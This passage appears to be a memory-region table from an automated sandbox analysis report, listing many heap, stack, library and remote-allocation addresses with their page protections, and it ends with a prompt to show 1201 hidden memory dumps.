C98000
|
heap
|
page read and write
|
||
|
1EC286C0000
|
heap
|
page read and write
|
||
|
164E000
|
stack
|
page read and write
|
||
|
1F4CB71D000
|
heap
|
page read and write
|
||
|
28E2B200000
|
heap
|
page read and write
|
||
|
555E000
|
stack
|
page read and write
|
||
|
219E57A7000
|
heap
|
page read and write
|
||
|
24417F61000
|
trusted library allocation
|
page read and write
|
||
|
67F0000
|
trusted library allocation
|
page read and write
|
||
|
219E61B3000
|
heap
|
page read and write
|
||
|
6700000
|
trusted library allocation
|
page execute and read and write
|
||
|
24416111000
|
heap
|
page read and write
|
||
|
24416157000
|
heap
|
page read and write
|
||
|
5680000
|
heap
|
page read and write
|
||
|
A4B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F4CB45F000
|
heap
|
page read and write
|
||
|
1F42A5BC000
|
heap
|
page read and write
|
||
|
1EC2846F000
|
heap
|
page read and write
|
||
|
1F42A160000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
C30B37C000
|
stack
|
page read and write
|
||
|
235C65D0000
|
trusted library allocation
|
page read and write
|
||
|
219E57DD000
|
heap
|
page read and write
|
||
|
1F42A5A0000
|
heap
|
page read and write
|
||
|
1F42A6A5000
|
trusted library allocation
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
75467FE000
|
stack
|
page read and write
|
||
|
235C6884000
|
heap
|
page read and write
|
||
|
E440D39000
|
stack
|
page read and write
|
||
|
10F6000
|
stack
|
page read and write
|
||
|
6770000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC2846F000
|
heap
|
page read and write
|
||
|
1FCCD670000
|
heap
|
page read and write
|
||
|
1308000
|
heap
|
page read and write
|
||
|
C30AC72000
|
stack
|
page read and write
|
||
|
211E2E38000
|
heap
|
page read and write
|
||
|
24417E50000
|
heap
|
page read and write
|
||
|
261C6277000
|
heap
|
page read and write
|
||
|
14B0000
|
heap
|
page read and write
|
||
|
10F9000
|
stack
|
page read and write
|
||
|
148E000
|
stack
|
page read and write
|
||
|
219E61B5000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
2D2AA8E1000
|
trusted library allocation
|
page read and write
|
||
|
219E57D4000
|
heap
|
page read and write
|
||
|
1710000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F42A6BF000
|
trusted library allocation
|
page read and write
|
||
|
219E61B3000
|
heap
|
page read and write
|
||
|
219E57BA000
|
heap
|
page read and write
|
||
|
75464F8000
|
stack
|
page read and write
|
||
|
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
|
A32000
|
trusted library allocation
|
page read and write
|
||
|
1F42A5AA000
|
heap
|
page read and write
|
||
|
BCC000
|
remote allocation
|
page execute and read and write
|
||
|
16A3000
|
trusted library allocation
|
page read and write
|
||
|
1220000
|
heap
|
page read and write
|
||
|
13B0000
|
remote allocation
|
page execute and read and write
|
||
|
219E57C1000
|
heap
|
page read and write
|
||
|
1EC28410000
|
heap
|
page read and write
|
||
|
1F4CB458000
|
heap
|
page read and write
|
||
|
235C6570000
|
trusted library allocation
|
page read and write
|
||
|
EF0000
|
trusted library allocation
|
page read and write
|
||
|
1EC28680000
|
trusted library allocation
|
page read and write
|
||
|
E440B78000
|
stack
|
page read and write
|
||
|
28E4513A000
|
heap
|
page read and write
|
||
|
2D2AA7F7000
|
trusted library allocation
|
page read and write
|
||
|
219E4F50000
|
trusted library allocation
|
page read and write
|
||
|
24429281000
|
trusted library allocation
|
page read and write
|
||
|
235C65F0000
|
trusted library allocation
|
page read and write
|
||
|
37D9000
|
trusted library allocation
|
page read and write
|
||
|
28E2CFA1000
|
trusted library allocation
|
page read and write
|
||
|
3442000
|
trusted library allocation
|
page read and write
|
||
|
24417A50000
|
trusted library section
|
page read and write
|
||
|
28E2B176000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
DE5000
|
heap
|
page read and write
|
||
|
9719C4F000
|
stack
|
page read and write
|
||
|
28E2D0E7000
|
trusted library allocation
|
page read and write
|
||
|
54BE3A8000
|
stack
|
page read and write
|
||
|
1693000
|
trusted library allocation
|
page execute and read and write
|
||
|
28E2B0F0000
|
heap
|
page read and write
|
||
|
DB6EE72000
|
stack
|
page read and write
|
||
|
176E000
|
heap
|
page read and write
|
||
|
97195FE000
|
stack
|
page read and write
|
||
|
28E2DACA000
|
trusted library allocation
|
page read and write
|
||
|
219E61AF000
|
heap
|
page read and write
|
||
|
4D43000
|
heap
|
page read and write
|
||
|
269C6914000
|
heap
|
page read and write
|
||
|
16BA000
|
trusted library allocation
|
page execute and read and write
|
||
|
106F000
|
stack
|
page read and write
|
||
|
5050000
|
heap
|
page read and write
|
||
|
219E576B000
|
heap
|
page read and write
|
||
|
219E4C3D000
|
trusted library allocation
|
page read and write
|
||
|
24416117000
|
heap
|
page read and write
|
||
|
4C61000
|
trusted library allocation
|
page read and write
|
||
|
211E2DB4000
|
heap
|
page read and write
|
||
|
B5D000
|
heap
|
page read and write
|
||
|
28E45324000
|
heap
|
page read and write
|
||
|
28E452B0000
|
heap
|
page read and write
|
||
|
1712000
|
trusted library allocation
|
page execute and read and write
|
||
|
CBE000
|
stack
|
page read and write
|
||
|
235C12AF000
|
heap
|
page read and write
|
||
|
CF0000
|
trusted library allocation
|
page read and write
|
||
|
535E000
|
stack
|
page read and write
|
||
|
86945FB000
|
stack
|
page read and write
|
||
|
235C6630000
|
trusted library allocation
|
page read and write
|
||
|
2D2C2813000
|
heap
|
page read and write
|
||
|
2874000
|
trusted library allocation
|
page read and write
|
||
|
E441B8D000
|
stack
|
page read and write
|
||
|
211E300D000
|
heap
|
page read and write
|
||
|
235C66C0000
|
trusted library allocation
|
page read and write
|
||
|
28E2D448000
|
trusted library allocation
|
page read and write
|
||
|
1F4CB474000
|
heap
|
page read and write
|
||
|
261C48D0000
|
heap
|
page read and write
|
||
|
134C000
|
heap
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
2D2C281C000
|
heap
|
page read and write
|
||
|
1EC28433000
|
heap
|
page read and write
|
||
|
5E6A000
|
heap
|
page read and write
|
||
|
869477E000
|
stack
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
219E57BE000
|
heap
|
page read and write
|
||
|
1300000
|
heap
|
page read and write
|
||
|
2442ADA2000
|
trusted library allocation
|
page read and write
|
||
|
211E2DBD000
|
heap
|
page read and write
|
||
|
24417DD0000
|
trusted library section
|
page read and write
|
||
|
6790000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F42A03E000
|
heap
|
page read and write
|
||
|
28E2B12E000
|
heap
|
page read and write
|
||
|
28E2DA36000
|
trusted library allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
235C128D000
|
heap
|
page read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
559E000
|
stack
|
page read and write
|
||
|
28E2CF36000
|
heap
|
page execute and read and write
|
||
|
1758000
|
heap
|
page read and write
|
||
|
1EC28464000
|
heap
|
page read and write
|
||
|
235C127B000
|
heap
|
page read and write
|
||
|
86950FE000
|
unkown
|
page readonly
|
||
|
261C4AB0000
|
heap
|
page read and write
|
||
|
47EC000
|
stack
|
page read and write
|
||
|
8694E7E000
|
stack
|
page read and write
|
||
|
28E2B0A0000
|
heap
|
page read and write
|
||
|
2D2C2A94000
|
heap
|
page read and write
|
||
|
24417F50000
|
heap
|
page execute and read and write
|
||
|
28E2B285000
|
heap
|
page read and write
|
||
|
1EC2848A000
|
heap
|
page read and write
|
||
|
DB6EF7E000
|
stack
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
1728000
|
heap
|
page read and write
|
||
|
2D2AB2EC000
|
trusted library allocation
|
page read and write
|
||
|
1F42B170000
|
heap
|
page read and write
|
||
|
1FCCD230000
|
heap
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
235C66C0000
|
trusted library allocation
|
page read and write
|
||
|
2441A987000
|
trusted library allocation
|
page read and write
|
||
|
86940FE000
|
unkown
|
page readonly
|
||
|
1EC28435000
|
heap
|
page read and write
|
||
|
CD0000
|
heap
|
page read and write
|
||
|
67D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
869527E000
|
stack
|
page read and write
|
||
|
2D2A87C0000
|
heap
|
page read and write
|
||
|
A3B000
|
stack
|
page read and write
|
||
|
2D2AB2A0000
|
trusted library allocation
|
page read and write
|
||
|
24417ED8000
|
heap
|
page read and write
|
||
|
2D2AB294000
|
trusted library allocation
|
page read and write
|
||
|
2812000
|
trusted library allocation
|
page read and write
|
||
|
1FCCD430000
|
heap
|
page read and write
|
||
|
219E57D4000
|
heap
|
page read and write
|
||
|
4C4B000
|
trusted library allocation
|
page read and write
|
||
|
235C6800000
|
heap
|
page read and write
|
||
|
235C17A0000
|
trusted library allocation
|
page read and write
|
||
|
CED000
|
heap
|
page read and write
|
||
|
1EC284C5000
|
heap
|
page read and write
|
||
|
28E2DA7A000
|
trusted library allocation
|
page read and write
|
||
|
244161E5000
|
heap
|
page read and write
|
||
|
235C1030000
|
heap
|
page read and write
|
||
|
244287F0000
|
trusted library allocation
|
page read and write
|
||
|
2D2C28D8000
|
heap
|
page read and write
|
||
|
5690000
|
trusted library allocation
|
page read and write
|
||
|
235C1FC1000
|
trusted library allocation
|
page read and write
|
||
|
28E455B0000
|
heap
|
page read and write
|
||
|
688E000
|
stack
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
219E4D54000
|
heap
|
page read and write
|
||
|
235C68C4000
|
heap
|
page read and write
|
||
|
2441611B000
|
heap
|
page read and write
|
||
|
2D2A86E0000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
DB6F4BE000
|
stack
|
page read and write
|
||
|
1EC28424000
|
heap
|
page read and write
|
||
|
8693CF7000
|
stack
|
page read and write
|
||
|
24417EF7000
|
heap
|
page read and write
|
||
|
1EC283D0000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
2D53000
|
trusted library allocation
|
page read and write
|
||
|
219E57C1000
|
heap
|
page read and write
|
||
|
175B000
|
trusted library allocation
|
page execute and read and write
|
||
|
6890000
|
trusted library allocation
|
page read and write
|
||
|
67A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2BA855000
|
trusted library allocation
|
page read and write
|
||
|
86951FE000
|
stack
|
page read and write
|
||
|
235C129F000
|
heap
|
page read and write
|
||
|
C30B1FE000
|
stack
|
page read and write
|
||
|
244161F0000
|
heap
|
page read and write
|
||
|
A2C000
|
trusted library allocation
|
page read and write
|
||
|
235C1200000
|
heap
|
page read and write
|
||
|
2D2C2900000
|
heap
|
page read and write
|
||
|
DB6F2BE000
|
stack
|
page read and write
|
||
|
1EC28417000
|
heap
|
page read and write
|
||
|
86946FE000
|
unkown
|
page readonly
|
||
|
24419F87000
|
trusted library allocation
|
page read and write
|
||
|
28E2CE80000
|
heap
|
page read and write
|
||
|
261C4A50000
|
trusted library allocation
|
page read and write
|
||
|
24427FD2000
|
trusted library allocation
|
page read and write
|
||
|
24416190000
|
heap
|
page read and write
|
||
|
168E000
|
stack
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
235C681D000
|
heap
|
page read and write
|
||
|
219E61C5000
|
heap
|
page read and write
|
||
|
191E000
|
stack
|
page read and write
|
||
|
24417FE7000
|
trusted library allocation
|
page read and write
|
||
|
2D2AB25A000
|
trusted library allocation
|
page read and write
|
||
|
269C6910000
|
heap
|
page read and write
|
||
|
2D2AA92E000
|
trusted library allocation
|
page read and write
|
||
|
A30000
|
trusted library allocation
|
page read and write
|
||
|
28E2CFE7000
|
trusted library allocation
|
page read and write
|
||
|
86958FB000
|
stack
|
page read and write
|
||
|
1762000
|
heap
|
page read and write
|
||
|
219E61AF000
|
heap
|
page read and write
|
||
|
28E2DAC7000
|
trusted library allocation
|
page read and write
|
||
|
235C122B000
|
heap
|
page read and write
|
||
|
219E6152000
|
heap
|
page read and write
|
||
|
219E57DD000
|
heap
|
page read and write
|
||
|
1744000
|
heap
|
page read and write
|
||
|
4C46000
|
trusted library allocation
|
page read and write
|
||
|
24417E89000
|
heap
|
page read and write
|
||
|
6710000
|
trusted library allocation
|
page read and write
|
||
|
E44198E000
|
stack
|
page read and write
|
||
|
211E2E16000
|
heap
|
page read and write
|
||
|
2441AD08000
|
trusted library allocation
|
page read and write
|
||
|
75466FF000
|
stack
|
page read and write
|
||
|
531F000
|
stack
|
page read and write
|
||
|
219E5787000
|
heap
|
page read and write
|
||
|
219E5762000
|
heap
|
page read and write
|
||
|
54BE7FE000
|
stack
|
page read and write
|
||
|
1334000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
2441612F000
|
heap
|
page read and write
|
||
|
219E57C2000
|
heap
|
page read and write
|
||
|
24417DB0000
|
trusted library allocation
|
page read and write
|
||
|
219E57A7000
|
heap
|
page read and write
|
||
|
219E615B000
|
heap
|
page read and write
|
||
|
2D2C2A89000
|
heap
|
page read and write
|
||
|
2441B70E000
|
trusted library allocation
|
page read and write
|
||
|
64BE000
|
stack
|
page read and write
|
||
|
86955FE000
|
unkown
|
page readonly
|
||
|
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
C5E000
|
stack
|
page read and write
|
||
|
261C48F0000
|
heap
|
page read and write
|
||
|
5E3F000
|
heap
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
261C495E000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
28E3CFA1000
|
trusted library allocation
|
page read and write
|
||
|
235C1110000
|
heap
|
page read and write
|
||
|
28E2CF30000
|
heap
|
page execute and read and write
|
||
|
280E000
|
trusted library allocation
|
page read and write
|
||
|
C30AE7D000
|
stack
|
page read and write
|
||
|
DB7018D000
|
stack
|
page read and write
|
||
|
33FF000
|
stack
|
page read and write
|
||
|
C30AD7F000
|
stack
|
page read and write
|
||
|
219E619A000
|
heap
|
page read and write
|
||
|
869487E000
|
stack
|
page read and write
|
||
|
86957FE000
|
unkown
|
page readonly
|
||
|
211E3006000
|
heap
|
page read and write
|
||
|
235C68BE000
|
heap
|
page read and write
|
||
|
1F42A5BD000
|
heap
|
page read and write
|
||
|
1F4CB3A0000
|
heap
|
page read and write
|
||
|
211E2D78000
|
heap
|
page read and write
|
||
|
1EC28479000
|
heap
|
page read and write
|
||
|
219E6194000
|
heap
|
page read and write
|
||
|
4C6D000
|
trusted library allocation
|
page read and write
|
||
|
C30ADFE000
|
stack
|
page read and write
|
||
|
C90000
|
heap
|
page read and write
|
||
|
219E61B9000
|
heap
|
page read and write
|
||
|
261C6277000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
2A3F000
|
stack
|
page read and write
|
||
|
235C65F1000
|
trusted library allocation
|
page read and write
|
||
|
235C21D0000
|
trusted library section
|
page readonly
|
||
|
211E2C60000
|
heap
|
page read and write
|
||
|
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
269C6870000
|
heap
|
page read and write
|
||
|
235C1902000
|
heap
|
page read and write
|
||
|
2A1F000
|
trusted library allocation
|
page read and write
|
||
|
A14000
|
trusted library allocation
|
page read and write
|
||
|
2A15000
|
trusted library allocation
|
page read and write
|
||
|
219E61C5000
|
heap
|
page read and write
|
||
|
219E6191000
|
heap
|
page read and write
|
||
|
16B0000
|
trusted library allocation
|
page read and write
|
||
|
605E000
|
stack
|
page read and write
|
||
|
219E6159000
|
heap
|
page read and write
|
||
|
24417E92000
|
heap
|
page read and write
|
||
|
1EC2841A000
|
heap
|
page read and write
|
||
|
28E2B300000
|
trusted library allocation
|
page read and write
|
||
|
28E2B260000
|
trusted library allocation
|
page read and write
|
||
|
667F000
|
stack
|
page read and write
|
||
|
28E2DA42000
|
trusted library allocation
|
page read and write
|
||
|
1694000
|
trusted library allocation
|
page read and write
|
||
|
DB7020F000
|
stack
|
page read and write
|
||
|
28E2D0AB000
|
trusted library allocation
|
page read and write
|
||
|
1EC283C4000
|
heap
|
page read and write
|
||
|
6090000
|
trusted library allocation
|
page read and write
|
||
|
219E57C4000
|
heap
|
page read and write
|
||
|
28E2DA7E000
|
trusted library allocation
|
page read and write
|
||
|
2D2A87E0000
|
heap
|
page read and write
|
||
|
235C7000000
|
heap
|
page read and write
|
||
|
DB6EFFF000
|
stack
|
page read and write
|
||
|
5EB6000
|
heap
|
page read and write
|
||
|
219E4C39000
|
trusted library allocation
|
page read and write
|
||
|
211E4637000
|
heap
|
page read and write
|
||
|
219E616D000
|
heap
|
page read and write
|
||
|
1EC283CD000
|
heap
|
page read and write
|
||
|
2B3F000
|
stack
|
page read and write
|
||
|
8694C7E000
|
stack
|
page read and write
|
||
|
219E61C3000
|
heap
|
page read and write
|
||
|
219E57BE000
|
heap
|
page read and write
|
||
|
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
|
235C65F0000
|
trusted library allocation
|
page read and write
|
||
|
1B50000
|
heap
|
page read and write
|
||
|
2D2AB318000
|
trusted library allocation
|
page read and write
|
||
|
76253FF000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
2D2A89C5000
|
heap
|
page read and write
|
||
|
219E61B0000
|
heap
|
page read and write
|
||
|
86948FE000
|
unkown
|
page readonly
|
||
|
2D2AB2A4000
|
trusted library allocation
|
page read and write
|
||
|
235C1815000
|
heap
|
page read and write
|
||
|
1EC283F7000
|
heap
|
page read and write
|
||
|
219E57BA000
|
heap
|
page read and write
|
||
|
219E57C9000
|
heap
|
page read and write
|
||
|
24429E75000
|
trusted library allocation
|
page read and write
|
||
|
235C21C0000
|
trusted library section
|
page readonly
|
||
|
261C627B000
|
heap
|
page read and write
|
||
|
E44077E000
|
stack
|
page read and write
|
||
|
2D2AA920000
|
trusted library allocation
|
page read and write
|
||
|
1790000
|
heap
|
page execute and read and write
|
||
|
1EC28477000
|
heap
|
page read and write
|
||
|
4C72000
|
trusted library allocation
|
page read and write
|
||
|
28E2CFD3000
|
trusted library allocation
|
page read and write
|
||
|
1F42A5AA000
|
heap
|
page read and write
|
||
|
CE0000
|
heap
|
page execute and read and write
|
||
|
261C4930000
|
heap
|
page read and write
|
||
|
3446000
|
trusted library allocation
|
page read and write
|
||
|
211E4620000
|
heap
|
page read and write
|
||
|
1110000
|
heap
|
page execute and read and write
|
||
|
2D2AA8D7000
|
trusted library allocation
|
page read and write
|
||
|
219E6161000
|
heap
|
page read and write
|
||
|
235C66D0000
|
trusted library allocation
|
page read and write
|
||
|
9719A4E000
|
stack
|
page read and write
|
||
|
235C12A5000
|
heap
|
page read and write
|
||
|
235C6660000
|
trusted library allocation
|
page read and write
|
||
|
235C1243000
|
heap
|
page read and write
|
||
|
261C63F4000
|
heap
|
page read and write
|
||
|
2D2AB2E8000
|
trusted library allocation
|
page read and write
|
||
|
28E2CFBB000
|
trusted library allocation
|
page read and write
|
||
|
DB6F07D000
|
stack
|
page read and write
|
||
|
211E2D57000
|
heap
|
page read and write
|
||
|
219E57A7000
|
heap
|
page read and write
|
||
|
4461000
|
trusted library allocation
|
page read and write
|
||
|
1EC28474000
|
heap
|
page read and write
|
||
|
1EC28432000
|
heap
|
page read and write
|
||
|
29D6000
|
trusted library allocation
|
page read and write
|
||
|
1F4CB450000
|
heap
|
page read and write
|
||
|
1F42A5B9000
|
heap
|
page read and write
|
||
|
C60000
|
heap
|
page read and write
|
||
|
2D2A89A0000
|
trusted library allocation
|
page read and write
|
||
|
8695F7E000
|
stack
|
page read and write
|
||
|
5900000
|
trusted library allocation
|
page read and write
|
||
|
5DE0000
|
heap
|
page read and write
|
||
|
DB6F1FD000
|
stack
|
page read and write
|
||
|
54AA000
|
trusted library allocation
|
page read and write
|
||
|
219E619C000
|
heap
|
page read and write
|
||
|
219E5770000
|
heap
|
page read and write
|
||
|
219E616D000
|
heap
|
page read and write
|
||
|
2A09000
|
trusted library allocation
|
page read and write
|
||
|
1742000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC286C6000
|
heap
|
page read and write
|
||
|
545E000
|
stack
|
page read and write
|
||
|
4C4E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
1EC2848A000
|
heap
|
page read and write
|
||
|
27FB000
|
trusted library allocation
|
page read and write
|
||
|
1EC28473000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
AF9000
|
stack
|
page read and write
|
||
|
24429A10000
|
trusted library allocation
|
page read and write
|
||
|
1F4CB390000
|
heap
|
page read and write
|
||
|
E441A0B000
|
stack
|
page read and write
|
||
|
C30B178000
|
stack
|
page read and write
|
||
|
6730000
|
trusted library allocation
|
page read and write
|
||
|
219E4CC5000
|
trusted library allocation
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
51DE000
|
stack
|
page read and write
|
||
|
58A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
1EC28410000
|
heap
|
page read and write
|
||
|
16F0000
|
heap
|
page read and write
|
||
|
1EC28432000
|
heap
|
page read and write
|
||
|
1F42A585000
|
trusted library allocation
|
page read and write
|
||
|
261C496F000
|
heap
|
page read and write
|
||
|
211E47ED000
|
heap
|
page read and write
|
||
|
7625FFE000
|
stack
|
page read and write
|
||
|
2A1B000
|
trusted library allocation
|
page read and write
|
||
|
16C7000
|
trusted library allocation
|
page execute and read and write
|
||
|
2696000
|
trusted library allocation
|
page read and write
|
||
|
261C6279000
|
heap
|
page read and write
|
||
|
1EC286CB000
|
heap
|
page read and write
|
||
|
28E3CFEB000
|
trusted library allocation
|
page read and write
|
||
|
1F42A037000
|
heap
|
page read and write
|
||
|
1F42A020000
|
heap
|
page read and write
|
||
|
16BF000
|
stack
|
page read and write
|
||
|
235C6610000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DED000
|
trusted library allocation
|
page execute and read and write
|
||
|
235C682A000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
261C63FD000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
8694BFE000
|
unkown
|
page readonly
|
||
|
24417F2C000
|
heap
|
page read and write
|
||
|
219E4CD5000
|
trusted library allocation
|
page read and write
|
||
|
1A5E000
|
stack
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
1007000
|
trusted library allocation
|
page execute and read and write
|
||
|
219E5787000
|
heap
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6740000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
2442B4E8000
|
trusted library allocation
|
page read and write
|
||
|
219E6161000
|
heap
|
page read and write
|
||
|
28E2B280000
|
heap
|
page read and write
|
||
|
1FCCD247000
|
heap
|
page read and write
|
||
|
2806000
|
trusted library allocation
|
page read and write
|
||
|
2441BFB1000
|
trusted library allocation
|
page read and write
|
||
|
219E61B3000
|
heap
|
page read and write
|
||
|
1520000
|
trusted library allocation
|
page read and write
|
||
|
C30B3FC000
|
stack
|
page read and write
|
||
|
2680000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C66000
|
trusted library allocation
|
page read and write
|
||
|
2D2AA82B000
|
trusted library allocation
|
page read and write
|
||
|
1F4CB740000
|
heap
|
page read and write
|
||
|
235C6630000
|
trusted library allocation
|
page read and write
|
||
|
DB7010E000
|
stack
|
page read and write
|
||
|
4CB0000
|
trusted library allocation
|
page read and write
|
||
|
869507E000
|
stack
|
page read and write
|
||
|
BD2000
|
remote allocation
|
page execute and read and write
|
||
|
E441B0B000
|
stack
|
page read and write
|
||
|
235C1010000
|
heap
|
page read and write
|
||
|
219E57BE000
|
heap
|
page read and write
|
||
|
67B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
219E61BE000
|
heap
|
page read and write
|
||
|
235C195A000
|
heap
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
244291CE000
|
trusted library allocation
|
page read and write
|
||
|
2D2AA821000
|
trusted library allocation
|
page read and write
|
||
|
28E2DA6B000
|
trusted library allocation
|
page read and write
|
||
|
211E2DB6000
|
heap
|
page read and write
|
||
|
1F4CB710000
|
heap
|
page read and write
|
||
|
4D40000
|
heap
|
page read and write
|
||
|
F12000
|
trusted library allocation
|
page execute and read and write
|
||
|
6780000
|
trusted library allocation
|
page read and write
|
||
|
2D2AA7D0000
|
heap
|
page execute and read and write
|
||
|
28E2DA55000
|
trusted library allocation
|
page read and write
|
There are 1201 hidden memdumps, click here to show them.